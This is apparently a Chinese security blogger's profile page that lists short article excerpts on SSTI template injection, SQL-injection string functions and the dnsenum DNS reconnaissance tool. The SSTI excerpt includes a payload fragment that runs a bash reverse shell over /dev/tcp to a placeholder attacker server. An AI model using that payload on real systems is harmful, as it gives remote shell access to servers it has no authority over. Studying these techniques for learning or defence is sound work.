- 博客(4)
- 收藏
- 关注
RSS订阅原创 模板注入SSTI
‘os’].popen(‘bash -i >& /dev/tcp/你的服务器地址/端口 0>&1’).read()//返回实例的对象,可以使类实例指向Class,使用上面的魔术方法。//返回类继承的元组,(寻找父类) python3。//返回类中的函数和属性,父类子类互不影响。//返回类的父类 python3。() //返回类中仍然可用的引用 python3。#python3没有file,用的是open。//返回类的初始化方法。#python2有file。与服务器环境相关的对象字典。
2023-11-01 22:10:52
111
1
原创 SQL注入常用函数
SQL注入常用函数concat(str1,“分隔符”,str2) 连接字符串并传入数据库(多列转换成一列显示)如:select concat(name,“|”,sex) from table_name;如果有一个参数的值是NULL,那么整行结果就会返回一个NULL。concat_ws(‘指定分隔符’,str1,str2,str3…) 用分隔符链接,多个字段的字符串(多列转换成一列)如:select concat_ws(“#”,id,username) from access;
2023-10-09 20:21:42
105
1
原创 DNSenum安装和运用
dnsenum 是一款用于收集 DNS 信息的工具,通过字典爆破、搜索引擎、whois 查询、区域传输等手段,获取域名背后的 DNS 信息并发现不连续的 IP 地址。它是一个多线程的 perl 语言脚本。dnsenum 在默认情况下会综合查询给定域名后面的 A 记录、NS 记录、MX 记录、bind 版本信息以及尝试做区域传输,最后使用默认的字典做 DNS 信息的爆破。当查询到 C 类地址的时候还会做反向的域名查询,以发现更多的域名。
2023-09-08 17:57:38
263
1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人